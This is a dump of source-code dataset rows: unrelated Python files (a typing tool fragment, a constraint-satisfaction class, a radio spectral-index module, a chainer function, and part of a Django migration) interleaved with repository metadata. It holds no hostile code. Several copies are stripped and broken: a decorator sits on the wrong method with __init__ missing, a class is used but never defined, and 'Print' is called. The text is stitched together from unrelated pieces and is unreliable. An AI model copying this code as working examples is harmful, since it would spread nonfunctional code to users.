    current_date = pd.to_datetime(int(time.time()), unit='s', utc=True)
    current_date = current_date.tz_convert('Asia/Tokyo')
    # Keep only rows newer than (now - date days).
    return df[df.index>current_date - pd.Timedelta(date, 'days') ]
def show_ranking(log_filename, date):
    """Print users ordered by their best typing speed over the period."""
    print(log_filename)
    df = get_df(log_filename, date)
    # Best (maximum) recorded speed per user.
    best_speed = {
        name: df[df['user'] == name]['speed'].max()
        for name in np.unique(df['user'])
    }
    print('user ranking')
    for name, speed in sorted(best_speed.items(),
                              key=lambda item: item[1], reverse=True):
        print(name + '\t\t' + '{:.1f}'.format(speed))
def show_summary(log_filename, user, date):
    """Print the given user's ten most frequently mistyped characters."""
    df = get_df(log_filename, date)
    df = df[df['user'] == user]
    print(user)
    print('Top 10 miss')
    # Columns from index 7 onward are the per-character mistype counts.
    print(df.sum(axis=0)[7:].sort_values(ascending=False)[:10])
def make_trainings(args):
    """Resolve the training phrases and the log-file location.

    Resolution priority for both the training-file directory and name:
    command-line option, then the TYPRO_PATH / TYPRO_FILE environment
    variables, then the data files bundled with the package.  Exits the
    process if the requested file does not exist.  Returns
    ``(training_list, path, filename, logpathfile)``.
    """
    # --- training file ---
    env_path = os.getenv('TYPRO_PATH')
    env_file = os.getenv('TYPRO_FILE')
    use_user_file = True
    # Fix: the sentinel 'None' is the argparse default string; compare with
    # != (the previous ``is 'None'`` relied on CPython string interning and
    # raises SyntaxWarning on Python 3.8+).
    if args.path != 'None':  # Priority 1 : Use option
        path = args.path
    elif env_path is not None:  # Priority 2 : Use environment variable
        path = env_path
    else:  # Priority 3 : Use package data
        path = 'data'
        use_user_file = False
    if args.file != 'None':
        filename = args.file
    elif env_file is not None:
        filename = env_file
    else:
        filename = 'default'
    if use_user_file:
        if path[-1] != '/':
            path += '/'
        train_filename = path + filename
        if not os.path.exists(train_filename):
            print('No such file : ' + train_filename)
            sys.exit()
        with open(train_filename) as f:
            # Keep non-blank lines, stripped of surrounding whitespace.
            training_list = [s.strip() for s in f.readlines() if len(s.strip()) > 0]
    else:
        # Bundled package file.
        training_files = pkg_resources.resource_listdir('typro', 'data')
        if filename not in training_files:
            print('No such training file included. Use')
            print(training_files)
            sys.exit()
        st = pkg_resources.resource_string('typro', 'data/' + filename).decode('utf-8')
        training_list = st.split('\n')
        training_list = [s.strip() for s in training_list if len(s) > 0]
    # Shuffle unless the user asked for the original order (-o).
    if not args.order:
        random.shuffle(training_list)
    # --- log file ---
    logpath = os.getenv('TYPRO_LOG_PATH')
    if args.logpath != 'None':
        logpath = args.logpath
    elif logpath is None:
        logpath = os.getenv('HOME')
    if logpath[-1] != '/':
        logpath += '/'
    logpathfile = logpath + args.logfile
    return training_list, path, filename, logpathfile
if __name__ == "__main__":
main()
| 12,381 | 0 | 207 |
9d2b134528efd1519790f90bdca15b1f067664aa | 46 | py | Python | beginner/chapter_1/exam_1_2.py | Bokji24Dev/CodeStudy | 4c0fc852e6f472d082e9836c59ad22d229f74d87 | [
"MIT"
] | null | null | null | beginner/chapter_1/exam_1_2.py | Bokji24Dev/CodeStudy | 4c0fc852e6f472d082e9836c59ad22d229f74d87 | [
"MIT"
] | null | null | null | beginner/chapter_1/exam_1_2.py | Bokji24Dev/CodeStudy | 4c0fc852e6f472d082e9836c59ad22d229f74d87 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
Print("Hello World!")
| 11.5 | 22 | 0.543478 | # -*- coding:utf-8 -*-
Print("Hello World!")
| 0 | 0 | 0 |
40f0c3601816e6c50563220f9bc0a95f7282cb07 | 10,389 | py | Python | dwavebinarycsp/core/csp.py | arcondello/dwavebinarycsp | 9df371a8456d3aa37f738e2089236a76822347ce | [
"Apache-2.0"
] | null | null | null | dwavebinarycsp/core/csp.py | arcondello/dwavebinarycsp | 9df371a8456d3aa37f738e2089236a76822347ce | [
"Apache-2.0"
] | null | null | null | dwavebinarycsp/core/csp.py | arcondello/dwavebinarycsp | 9df371a8456d3aa37f738e2089236a76822347ce | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ================================================================================================
"""
Constraint satisfaction problems require that all a problem's variables be assigned
values, out of a finite domain, that result in the satisfying of all constraints.
The :class:`ConstraintSatisfactionProblem` class aggregates all constraints and variables
defined for a problem and provides functionality to assist in problem solution, such
as verifying whether a candidate solution satisfies the constraints.
"""
# Fix: ``Callable`` and ``Iterable`` live in collections.abc; importing
# them from ``collections`` was deprecated in 3.3 and removed in 3.10.
from collections import defaultdict
from collections.abc import Callable, Iterable

import dimod

from dwavebinarycsp.core.constraint import Constraint
class ConstraintSatisfactionProblem(object):
    """A constraint satisfaction problem.

    Args:
        vartype (:class:`~dimod.Vartype`/str/set):
            Variable type for the binary quadratic model. Supported values are:

            * :attr:`~dimod.Vartype.SPIN`, ``'SPIN'``, ``{-1, 1}``
            * :attr:`~dimod.Vartype.BINARY`, ``'BINARY'``, ``{0, 1}``

    Attributes:
        constraints (list[:obj:`.Constraint`]):
            Constraints that together constitute the constraint satisfaction
            problem. Valid solutions satisfy all of the constraints.

        variables (dict[variable, list[:obj:`.Constraint`]]):
            Variables of the constraint satisfaction problem as a dict, where
            keys are the variables and values a list of all of constraints
            associated with the variable.

        vartype (:class:`dimod.Vartype`):
            Enumeration of valid variable types. Supported values are
            :attr:`~dimod.Vartype.SPIN` or :attr:`~dimod.Vartype.BINARY`.
            If `vartype` is SPIN, variables can be assigned -1 or 1;
            if BINARY, variables can be assigned 0 or 1.

    Example:
        This example creates a binary-valued constraint satisfaction problem,
        adds two constraints, :math:`a = b` and :math:`b \\ne c`, and tests
        :math:`a,b,c = 1,1,0`.

        >>> import dwavebinarycsp
        >>> import operator
        >>> csp = dwavebinarycsp.ConstraintSatisfactionProblem('BINARY')
        >>> csp.add_constraint(operator.eq, ['a', 'b'])
        >>> csp.add_constraint(operator.ne, ['b', 'c'])
        >>> csp.check({'a': 1, 'b': 1, 'c': 0})
        True

    """

    # NOTE(review): this decorator validates a ``vartype`` argument, but the
    # method below has no such parameter -- in the upstream source it
    # decorates ``__init__``, which is missing from this copy.  TODO confirm.
    @dimod.vartype_argument('vartype')
    def add_constraint(self, constraint, variables=tuple()):
        """Add a constraint.

        Args:
            constraint (function/iterable/:obj:`.Constraint`):
                Constraint definition in one of the supported formats:

                1. Function, with input arguments matching the order and
                   :attr:`~.ConstraintSatisfactionProblem.vartype` type of the
                   `variables` argument, that evaluates True when the
                   constraint is satisfied.
                2. List explicitly specifying each allowed configuration as a
                   tuple.
                3. :obj:`.Constraint` object built either explicitly or by
                   :mod:`dwavebinarycsp.factories`.

            variables(iterable):
                Variables associated with the constraint. Not required when
                `constraint` is a :obj:`.Constraint` object.

        Examples:
            This example defines a function that evaluates True when the
            constraint is satisfied. The function's input arguments match the
            order and type of the `variables` argument.

            >>> import dwavebinarycsp
            >>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.BINARY)
            >>> def all_equal(a, b, c): # works for both dwavebinarycsp.BINARY and dwavebinarycsp.SPIN
            ... return (a == b) and (b == c)
            >>> csp.add_constraint(all_equal, ['a', 'b', 'c'])
            >>> csp.check({'a': 0, 'b': 0, 'c': 0})
            True
            >>> csp.check({'a': 0, 'b': 0, 'c': 1})
            False

            This example explicitly lists allowed configurations.

            >>> import dwavebinarycsp
            >>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.SPIN)
            >>> eq_configurations = {(-1, -1), (1, 1)}
            >>> csp.add_constraint(eq_configurations, ['v0', 'v1'])
            >>> csp.check({'v0': -1, 'v1': +1})
            False
            >>> csp.check({'v0': -1, 'v1': -1})
            True

            This example uses a :obj:`.Constraint` object built by
            :mod:`dwavebinarycsp.factories`.

            >>> import dwavebinarycsp
            >>> import dwavebinarycsp.factories.constraint.gates as gates
            >>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.BINARY)
            >>> csp.add_constraint(gates.and_gate(['a', 'b', 'c'])) # add an AND gate
            >>> csp.add_constraint(gates.xor_gate(['a', 'c', 'd'])) # add an XOR gate
            >>> csp.check({'a': 1, 'b': 0, 'c': 0, 'd': 1})
            True

        """
        if isinstance(constraint, Constraint):
            # Already-built Constraint: variables, if given, must agree.
            if variables and (tuple(variables) != constraint.variables):
                raise ValueError("mismatched variables and Constraint")
        elif isinstance(constraint, Callable):
            # Predicate function: wrap it as a Constraint.
            constraint = Constraint.from_func(constraint, variables, self.vartype)
        elif isinstance(constraint, Iterable):
            # Explicit table of allowed configurations.
            constraint = Constraint.from_configurations(constraint, variables, self.vartype)
        else:
            raise TypeError("Unknown constraint type given")
        self.constraints.append(constraint)
        # Index the constraint under each of its variables.
        for v in constraint.variables:
            self.variables[v].append(constraint)

    def add_variable(self, v):
        """Add a variable.

        Args:
            v (variable):
                Variable in the constraint satisfaction problem. May be of any
                type that can be a dict key.

        Examples:
            This example adds two variables, one of which is already used in a
            constraint of the constraint satisfaction problem.

            >>> import dwavebinarycsp
            >>> import operator
            >>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.SPIN)
            >>> csp.add_constraint(operator.eq, ['a', 'b'])
            >>> csp.add_variable('a') # does nothing, already added as part of the constraint
            >>> csp.add_variable('c')
            >>> csp.check({'a': -1, 'b': -1, 'c': 1})
            True
            >>> csp.check({'a': -1, 'b': -1, 'c': -1})
            True

        """
        self.variables[v] # because defaultdict will create it if it's not there

    def check(self, solution):
        """Check that a solution satisfies all of the constraints.

        Args:
            solution (container):
                An assignment of values for the variables in the constraint
                satisfaction problem.

        Returns:
            bool: True if the solution satisfies all of the constraints; False
            otherwise.

        Examples:
            This example creates a binary-valued constraint satisfaction
            problem, adds two logic gates implementing Boolean constraints,
            :math:`c = a \wedge b` and :math:`d = a \oplus c`, and verifies
            that the combined problem is satisfied for a given assignment.

            >>> import dwavebinarycsp
            >>> import dwavebinarycsp.factories.constraint.gates as gates
            >>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.BINARY)
            >>> csp.add_constraint(gates.and_gate(['a', 'b', 'c'])) # add an AND gate
            >>> csp.add_constraint(gates.xor_gate(['a', 'c', 'd'])) # add an XOR gate
            >>> csp.check({'a': 1, 'b': 0, 'c': 0, 'd': 1})
            True

        """
        return all(constraint.check(solution) for constraint in self.constraints)

    def fix_variable(self, v, value):
        """Fix the value of a variable and remove it from the constraint
        satisfaction problem.

        Args:
            v (variable):
                Variable to be fixed in the constraint satisfaction problem.

            value (int):
                Value assigned to the variable. Values must match the
                :attr:`~.ConstraintSatisfactionProblem.vartype` of the
                constraint satisfaction problem.

        Examples:
            This example creates a spin-valued constraint satisfaction problem,
            adds two constraints, :math:`a = b` and :math:`b \\ne c`, and fixes
            variable b to +1.

            >>> import dwavebinarycsp
            >>> import operator
            >>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.SPIN)
            >>> csp.add_constraint(operator.eq, ['a', 'b'])
            >>> csp.add_constraint(operator.ne, ['b', 'c'])
            >>> csp.check({'a': +1, 'b': +1, 'c': -1})
            True
            >>> csp.check({'a': -1, 'b': -1, 'c': +1})
            True
            >>> csp.fix_variable('b', +1)
            >>> csp.check({'a': +1, 'b': +1, 'c': -1}) # 'b' is ignored
            True
            >>> csp.check({'a': -1, 'b': -1, 'c': +1})
            False
            >>> csp.check({'a': +1, 'c': -1})
            True
            >>> csp.check({'a': -1, 'c': +1})
            False

        """
        if v not in self.variables:
            raise ValueError("given variable {} is not part of the constraint satisfaction problem".format(v))
        # Propagate the fixed value into every constraint mentioning v.
        for constraint in self.variables[v]:
            constraint.fix_variable(v, value)
        del self.variables[v] # delete the variable
CSP = ConstraintSatisfactionProblem
"""An alias for :class:`.ConstraintSatisfactionProblem`."""
| 42.753086 | 110 | 0.594282 | # Copyright 2018 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ================================================================================================
"""
Constraint satisfaction problems require that all a problem's variables be assigned
values, out of a finite domain, that result in the satisfying of all constraints.
The :class:`ConstraintSatisfactionProblem` class aggregates all constraints and variables
defined for a problem and provides functionality to assist in problem solution, such
as verifying whether a candidate solution satisfies the constraints.
"""
# Fix: ``Callable`` and ``Iterable`` live in collections.abc; importing
# them from ``collections`` was deprecated in 3.3 and removed in 3.10.
from collections import defaultdict
from collections.abc import Callable, Iterable

import dimod

from dwavebinarycsp.core.constraint import Constraint
class ConstraintSatisfactionProblem(object):
    """A constraint satisfaction problem.

    Args:
        vartype (:class:`~dimod.Vartype`/str/set):
            Variable type for the binary quadratic model. Supported values are:

            * :attr:`~dimod.Vartype.SPIN`, ``'SPIN'``, ``{-1, 1}``
            * :attr:`~dimod.Vartype.BINARY`, ``'BINARY'``, ``{0, 1}``

    Attributes:
        constraints (list[:obj:`.Constraint`]):
            Constraints that together constitute the constraint satisfaction
            problem. Valid solutions satisfy all of the constraints.

        variables (dict[variable, list[:obj:`.Constraint`]]):
            Variables of the constraint satisfaction problem as a dict, where
            keys are the variables and values a list of all of constraints
            associated with the variable.

        vartype (:class:`dimod.Vartype`):
            Enumeration of valid variable types. Supported values are
            :attr:`~dimod.Vartype.SPIN` or :attr:`~dimod.Vartype.BINARY`.
            If `vartype` is SPIN, variables can be assigned -1 or 1;
            if BINARY, variables can be assigned 0 or 1.

    Example:
        This example creates a binary-valued constraint satisfaction problem,
        adds two constraints, :math:`a = b` and :math:`b \\ne c`, and tests
        :math:`a,b,c = 1,1,0`.

        >>> import dwavebinarycsp
        >>> import operator
        >>> csp = dwavebinarycsp.ConstraintSatisfactionProblem('BINARY')
        >>> csp.add_constraint(operator.eq, ['a', 'b'])
        >>> csp.add_constraint(operator.ne, ['b', 'c'])
        >>> csp.check({'a': 1, 'b': 1, 'c': 0})
        True

    """

    @dimod.vartype_argument('vartype')
    def __init__(self, vartype):
        # ``vartype_argument`` validates/normalizes vartype to a dimod.Vartype.
        self.vartype = vartype
        self.constraints = []
        # Maps each variable to the constraints that mention it; the
        # defaultdict lets add_variable register a variable by mere lookup.
        self.variables = defaultdict(list)

    def __len__(self):
        # The length of a CSP is its number of constraints.
        return self.constraints.__len__()

    def add_constraint(self, constraint, variables=tuple()):
        """Add a constraint.

        Args:
            constraint (function/iterable/:obj:`.Constraint`):
                Constraint definition in one of the supported formats:

                1. Function, with input arguments matching the order and
                   :attr:`~.ConstraintSatisfactionProblem.vartype` type of the
                   `variables` argument, that evaluates True when the
                   constraint is satisfied.
                2. List explicitly specifying each allowed configuration as a
                   tuple.
                3. :obj:`.Constraint` object built either explicitly or by
                   :mod:`dwavebinarycsp.factories`.

            variables(iterable):
                Variables associated with the constraint. Not required when
                `constraint` is a :obj:`.Constraint` object.

        Examples:
            This example defines a function that evaluates True when the
            constraint is satisfied. The function's input arguments match the
            order and type of the `variables` argument.

            >>> import dwavebinarycsp
            >>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.BINARY)
            >>> def all_equal(a, b, c): # works for both dwavebinarycsp.BINARY and dwavebinarycsp.SPIN
            ... return (a == b) and (b == c)
            >>> csp.add_constraint(all_equal, ['a', 'b', 'c'])
            >>> csp.check({'a': 0, 'b': 0, 'c': 0})
            True
            >>> csp.check({'a': 0, 'b': 0, 'c': 1})
            False

            This example explicitly lists allowed configurations.

            >>> import dwavebinarycsp
            >>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.SPIN)
            >>> eq_configurations = {(-1, -1), (1, 1)}
            >>> csp.add_constraint(eq_configurations, ['v0', 'v1'])
            >>> csp.check({'v0': -1, 'v1': +1})
            False
            >>> csp.check({'v0': -1, 'v1': -1})
            True

            This example uses a :obj:`.Constraint` object built by
            :mod:`dwavebinarycsp.factories`.

            >>> import dwavebinarycsp
            >>> import dwavebinarycsp.factories.constraint.gates as gates
            >>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.BINARY)
            >>> csp.add_constraint(gates.and_gate(['a', 'b', 'c'])) # add an AND gate
            >>> csp.add_constraint(gates.xor_gate(['a', 'c', 'd'])) # add an XOR gate
            >>> csp.check({'a': 1, 'b': 0, 'c': 0, 'd': 1})
            True

        """
        if isinstance(constraint, Constraint):
            # Already-built Constraint: variables, if given, must agree.
            if variables and (tuple(variables) != constraint.variables):
                raise ValueError("mismatched variables and Constraint")
        elif isinstance(constraint, Callable):
            # Predicate function: wrap it as a Constraint.
            constraint = Constraint.from_func(constraint, variables, self.vartype)
        elif isinstance(constraint, Iterable):
            # Explicit table of allowed configurations.
            constraint = Constraint.from_configurations(constraint, variables, self.vartype)
        else:
            raise TypeError("Unknown constraint type given")
        self.constraints.append(constraint)
        # Index the constraint under each of its variables.
        for v in constraint.variables:
            self.variables[v].append(constraint)

    def add_variable(self, v):
        """Add a variable.

        Args:
            v (variable):
                Variable in the constraint satisfaction problem. May be of any
                type that can be a dict key.

        Examples:
            This example adds two variables, one of which is already used in a
            constraint of the constraint satisfaction problem.

            >>> import dwavebinarycsp
            >>> import operator
            >>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.SPIN)
            >>> csp.add_constraint(operator.eq, ['a', 'b'])
            >>> csp.add_variable('a') # does nothing, already added as part of the constraint
            >>> csp.add_variable('c')
            >>> csp.check({'a': -1, 'b': -1, 'c': 1})
            True
            >>> csp.check({'a': -1, 'b': -1, 'c': -1})
            True

        """
        self.variables[v] # because defaultdict will create it if it's not there

    def check(self, solution):
        """Check that a solution satisfies all of the constraints.

        Args:
            solution (container):
                An assignment of values for the variables in the constraint
                satisfaction problem.

        Returns:
            bool: True if the solution satisfies all of the constraints; False
            otherwise.

        Examples:
            This example creates a binary-valued constraint satisfaction
            problem, adds two logic gates implementing Boolean constraints,
            :math:`c = a \wedge b` and :math:`d = a \oplus c`, and verifies
            that the combined problem is satisfied for a given assignment.

            >>> import dwavebinarycsp
            >>> import dwavebinarycsp.factories.constraint.gates as gates
            >>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.BINARY)
            >>> csp.add_constraint(gates.and_gate(['a', 'b', 'c'])) # add an AND gate
            >>> csp.add_constraint(gates.xor_gate(['a', 'c', 'd'])) # add an XOR gate
            >>> csp.check({'a': 1, 'b': 0, 'c': 0, 'd': 1})
            True

        """
        return all(constraint.check(solution) for constraint in self.constraints)

    def fix_variable(self, v, value):
        """Fix the value of a variable and remove it from the constraint
        satisfaction problem.

        Args:
            v (variable):
                Variable to be fixed in the constraint satisfaction problem.

            value (int):
                Value assigned to the variable. Values must match the
                :attr:`~.ConstraintSatisfactionProblem.vartype` of the
                constraint satisfaction problem.

        Examples:
            This example creates a spin-valued constraint satisfaction problem,
            adds two constraints, :math:`a = b` and :math:`b \\ne c`, and fixes
            variable b to +1.

            >>> import dwavebinarycsp
            >>> import operator
            >>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.SPIN)
            >>> csp.add_constraint(operator.eq, ['a', 'b'])
            >>> csp.add_constraint(operator.ne, ['b', 'c'])
            >>> csp.check({'a': +1, 'b': +1, 'c': -1})
            True
            >>> csp.check({'a': -1, 'b': -1, 'c': +1})
            True
            >>> csp.fix_variable('b', +1)
            >>> csp.check({'a': +1, 'b': +1, 'c': -1}) # 'b' is ignored
            True
            >>> csp.check({'a': -1, 'b': -1, 'c': +1})
            False
            >>> csp.check({'a': +1, 'c': -1})
            True
            >>> csp.check({'a': -1, 'c': +1})
            False

        """
        if v not in self.variables:
            raise ValueError("given variable {} is not part of the constraint satisfaction problem".format(v))
        # Propagate the fixed value into every constraint mentioning v.
        for constraint in self.variables[v]:
            constraint.fix_variable(v, value)
        del self.variables[v] # delete the variable
"""An alias for :class:`.ConstraintSatisfactionProblem`."""
| 150 | 0 | 53 |
5f052a63c206b64e95ae6a86f33251a40b0a7a0c | 1,771 | py | Python | src/radiomap/__init__.py | avialxee/radiomap | a14acc348fb867b32c0ea3b4ce97ba9726c3e714 | [
"BSD-3-Clause"
] | null | null | null | src/radiomap/__init__.py | avialxee/radiomap | a14acc348fb867b32c0ea3b4ce97ba9726c3e714 | [
"BSD-3-Clause"
] | null | null | null | src/radiomap/__init__.py | avialxee/radiomap | a14acc348fb867b32c0ea3b4ce97ba9726c3e714 | [
"BSD-3-Clause"
] | null | null | null | #-- author: @avialxee ---#--#
#from radmap import rad_helpers
from _helpers import vz_query
import numpy as np
tgss = [[1, 12, 0.003], [2, 22, 32]]
nvss = [[12, 2, 13], [12, 2, 0.2]]
#tgss = np.array(tgss)
ins = RadioMap()
#
#print(tgss)
#print(nvss)
ind = np.where(np.array(tgss) < 0.015)
tgss[ind] =0.0
print(ins.spectral_index(tgss, nvss))
#print(ins.throw_output()) | 26.833333 | 83 | 0.557312 | #-- author: @avialxee ---#--#
#from radmap import rad_helpers
from _helpers import vz_query
import numpy as np
class RadioMap:
    """Compute radio-survey quantities for a sky position.

    The instance keeps an HTTP-like status report of the last operation in
    ``status`` / ``info`` / ``msg``, retrievable via :meth:`throw_output`.
    """

    def __init__(self, position='', radius=0.12) -> None:
        self.position = str(position)
        self.radius = float(radius)
        self.wcs = None               # placeholder for a WCS object; never set here
        self.status = 403             # HTTP-like status of the last operation
        self.info = 'not available yet'
        self.msg = []                 # list of dicts with diagnostic messages

    def throw_output(self):
        """
        returns output showing status of output.
        """
        return {'status': self.status, 'info': self.info, 'message': str(self.msg)}

    def spectral_index(self, tgss, nvss):
        """Compute the spectral index between TGSS (150 MHz) and NVSS (1420 MHz).

        alpha = - log(tgss_s/nvss_s)/log(tgss_v/nvss_v)

        Args:
            tgss, nvss: array-like flux densities of matching shape.

        Returns:
            numpy.ndarray of spectral indices with the input's shape on
            success, or the string ``'failed'`` on any error.  In both
            cases ``status`` / ``info`` / ``msg`` are updated.

        TODO: error calculations.
        """
        factor = 150 / 1420  # tgss_v / nvss_v (survey frequency ratio)
        try:
            tgss, nvss, dim = self._sanitize_svy(tgss, nvss)
            self.status = 200
            self.info = 'success'
            si = -np.round(np.log(np.divide(tgss, nvss)) / np.log(factor), 3)
            self.msg.append({'max spectral index': np.max(np.reshape(si, dim))})
            return np.reshape(si, dim)
        except Exception as e:
            # Best-effort API: record the failure in the status report
            # instead of propagating the exception to the caller.
            self.status = 417
            self.info = 'failed'
            self.msg.append({'exception': str(e)})
            return 'failed'

    @staticmethod
    def _sanitize_svy(tgss, nvss):
        # Coerce inputs to numpy, remember the original shape, and hand back
        # flat iterators so the element-wise math ignores dimensionality.
        tgss, nvss = np.array(tgss), np.array(nvss)
        dim = tgss.shape
        tgss, nvss = tgss.flat, nvss.flat
        return tgss, nvss, dim
# --- demo / smoke test ---------------------------------------------------
# Example TGSS (150 MHz) and NVSS (1420 MHz) flux grids.
tgss = [[1, 12, 0.003], [2, 22, 32]]
nvss = [[12, 2, 13], [12, 2, 0.2]]

ins = RadioMap()

# BUG FIX: np.where() returns a tuple of index arrays, which cannot be used
# to index a plain Python list (TypeError) -- convert to an ndarray first.
tgss = np.array(tgss, dtype=float)
# Zero out fluxes below the 0.015 threshold before computing the index.
tgss[np.where(tgss < 0.015)] = 0.0

print(ins.spectral_index(tgss, nvss))
#print(ins.throw_output()) | 385 | 988 | 23 |
208ec47a64ed3efe67e55ee276a49e934e71d0b8 | 2,015 | py | Python | chainer/functions/math/squared_difference.py | tkerola/chainer | 572f6eef2c3f1470911ac08332c2b5c3440edf44 | [
"MIT"
] | 1 | 2021-02-26T10:27:25.000Z | 2021-02-26T10:27:25.000Z | chainer/functions/math/squared_difference.py | hitsgub/chainer | 20d4d70f5cdacc1f24f243443f5bebc2055c8f8e | [
"MIT"
] | null | null | null | chainer/functions/math/squared_difference.py | hitsgub/chainer | 20d4d70f5cdacc1f24f243443f5bebc2055c8f8e | [
"MIT"
] | 2 | 2019-07-16T00:24:47.000Z | 2021-02-26T10:27:27.000Z | from chainer import backend
from chainer import function_node
from chainer import utils
from chainer.utils import type_check
class SquaredDifference(function_node.FunctionNode):
"""Squared difference of input variables."""
def squared_difference(x1, x2):
"""Squared difference of input variables.
Args:
x1 (:class:`~chainer.Variable` or :ref:`ndarray`):
Input variables to be compared.
A :math:`(s_1, s_2, ..., s_N)` -shaped float array.
x2 (:class:`~chainer.Variable` or :ref:`ndarray`):
Input variables to be compared.
A :math:`(s_1, s_2, ..., s_N)` -shaped float array.
Returns:
~chainer.Variable: ``(x1 - x2) ** 2`` element-wise.
A :math:`(s_1, s_2, ..., s_N)` -shaped float array.
.. admonition:: Example
>>> x1 = np.arange(6).astype(np.float32)
>>> x1
array([0., 1., 2., 3., 4., 5.], dtype=float32)
>>> x2 = np.array([5, 4, 3, 2, 1, 0]).astype(np.float32)
>>> x2
array([5., 4., 3., 2., 1., 0.], dtype=float32)
>>> y = F.squared_difference(x1, x2)
>>> y.shape
(6,)
>>> y.array
array([25., 9., 1., 1., 9., 25.], dtype=float32)
"""
return SquaredDifference().apply((x1, x2))[0]
| 30.530303 | 64 | 0.554839 | from chainer import backend
from chainer import function_node
from chainer import utils
from chainer.utils import type_check
class SquaredDifference(function_node.FunctionNode):

    """Element-wise squared difference of two input variables."""

    def check_type_forward(self, in_types):
        # Both inputs must be floating point, with identical dtype and shape.
        type_check._argname(in_types, ('x1', 'x2'))
        type_check.expect(
            in_types[0].dtype.kind == 'f',
            in_types[0].dtype == in_types[1].dtype,
            in_types[0].shape == in_types[1].shape
        )

    def forward(self, inputs):
        # Keep both inputs for the backward pass.
        self.retain_inputs((0, 1))
        x1, x2 = inputs
        xp = backend.get_array_module(x1, x2)
        out = xp.square(x1 - x2)
        return utils.force_array(out, dtype=x1.dtype),

    def backward(self, indexes, grads):
        # d/dx1 (x1 - x2)^2 = 2 (x1 - x2); d/dx2 is its negation.
        x1, x2 = self.get_retained_inputs()
        g = 2 * (x1 - x2) * grads[0]
        return g, -g
def squared_difference(x1, x2):
    """Element-wise squared difference ``(x1 - x2) ** 2`` of input variables.

    Args:
        x1 (:class:`~chainer.Variable` or :ref:`ndarray`):
            First operand, a :math:`(s_1, s_2, ..., s_N)` -shaped float array.
        x2 (:class:`~chainer.Variable` or :ref:`ndarray`):
            Second operand, a :math:`(s_1, s_2, ..., s_N)` -shaped float array
            with the same shape and dtype as ``x1``.

    Returns:
        ~chainer.Variable: ``(x1 - x2) ** 2`` element-wise.
        A :math:`(s_1, s_2, ..., s_N)` -shaped float array.

    .. admonition:: Example

        >>> x1 = np.arange(6).astype(np.float32)
        >>> x1
        array([0., 1., 2., 3., 4., 5.], dtype=float32)
        >>> x2 = np.array([5, 4, 3, 2, 1, 0]).astype(np.float32)
        >>> x2
        array([5., 4., 3., 2., 1., 0.], dtype=float32)
        >>> y = F.squared_difference(x1, x2)
        >>> y.shape
        (6,)
        >>> y.array
        array([25., 9., 1., 1., 9., 25.], dtype=float32)
    """
    # apply() returns a tuple of outputs; this op produces exactly one.
    y, = SquaredDifference().apply((x1, x2))
    return y
| 643 | 0 | 81 |
abad2905f2dfbd24fa36edc81b85288f2a0820c5 | 2,684 | py | Python | server/applications/migrations/0001_initial.py | eBioKit/ebiokit-site | f9c8931aca6a8009f313a409fed8314300dfeca8 | [
"MIT"
] | 1 | 2019-11-10T09:25:02.000Z | 2019-11-10T09:25:02.000Z | server/applications/migrations/0001_initial.py | eBioKit/ebiokit-site | f9c8931aca6a8009f313a409fed8314300dfeca8 | [
"MIT"
] | 5 | 2018-02-01T19:21:48.000Z | 2021-06-10T20:10:18.000Z | server/applications/migrations/0001_initial.py | eBioKit/ebiokit-site | f9c8931aca6a8009f313a409fed8314300dfeca8 | [
"MIT"
] | 2 | 2019-05-20T07:59:17.000Z | 2019-11-10T09:25:05.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-06-22 11:37
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
| 41.292308 | 114 | 0.554396 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-06-22 11:37
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial schema for the applications app: Application, Job, RemoteServer and Task tables."""

    initial = True

    # First migration of the app: no dependencies on other migrations.
    dependencies = [
    ]

    operations = [
        # Installed application/service instance; instance_name and port are
        # unique across the installation, `type` is a one-char discriminator.
        # NOTE(review): the b'...' bytes defaults on Char/Text fields look like
        # Python 2-era autogeneration -- confirm they are intended.
        migrations.CreateModel(
            name='Application',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('instance_name', models.CharField(max_length=100, unique=True)),
                ('service', models.CharField(max_length=100)),
                ('version', models.CharField(default=b'0.1', max_length=100)),
                ('title', models.CharField(default=b'New application', max_length=100)),
                ('description', models.CharField(max_length=1000)),
                ('categories', models.CharField(max_length=500)),
                ('website', models.CharField(max_length=500)),
                ('port', models.CharField(max_length=100, unique=True)),
                ('type', models.CharField(default=b'1', max_length=1)),
                ('installed', models.DateTimeField(default=django.utils.timezone.now)),
                ('enabled', models.BooleanField(default=1)),
